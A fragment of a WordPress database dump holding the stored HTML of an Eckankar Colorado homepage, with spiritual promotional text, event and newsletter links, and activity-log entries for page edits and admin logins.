class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242845,41181,'_message_key','post_updated'),(242846,41181,'_user_id','2'),(242847,41181,'_user_login','S8zhaBda'),(242848,41181,'_user_email','nada@zipnadanot.org'),(242849,41181,'_server_remote_addr','76.130.120.x'),(242850,41181,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(242851,41182,'_user_id','2'),(242852,41182,'_user_login','S8zhaBda'),(242853,41182,'_user_email','nada@zipnadanot.org'),(242854,41182,'_message_key','user_logged_out'),(242855,41182,'_server_remote_addr','76.130.120.x'),(242856,41182,'_server_http_referer','https://eckankar-colorado.org/wp-admin/'),(242857,41183,'user_id','2'),(242858,41183,'user_email','nada@zipnadanot.org'),(242859,41183,'user_login','S8zhaBda'),(242860,41183,'_user_id','2'),(242861,41183,'_user_login','S8zhaBda'),(242862,41183,'_user_email','nada@zipnadanot.org'),(242863,41183,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(242864,41183,'_message_key','user_logged_in'),(242865,41183,'_server_remote_addr','76.130.120.x'),(242866,41183,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(242867,41184,'post_id','7160'),(242868,41184,'post_type','page'),(242869,41184,'post_title','Home'),(242870,41184,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 18px; text-align: center; color: #ad7a05;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 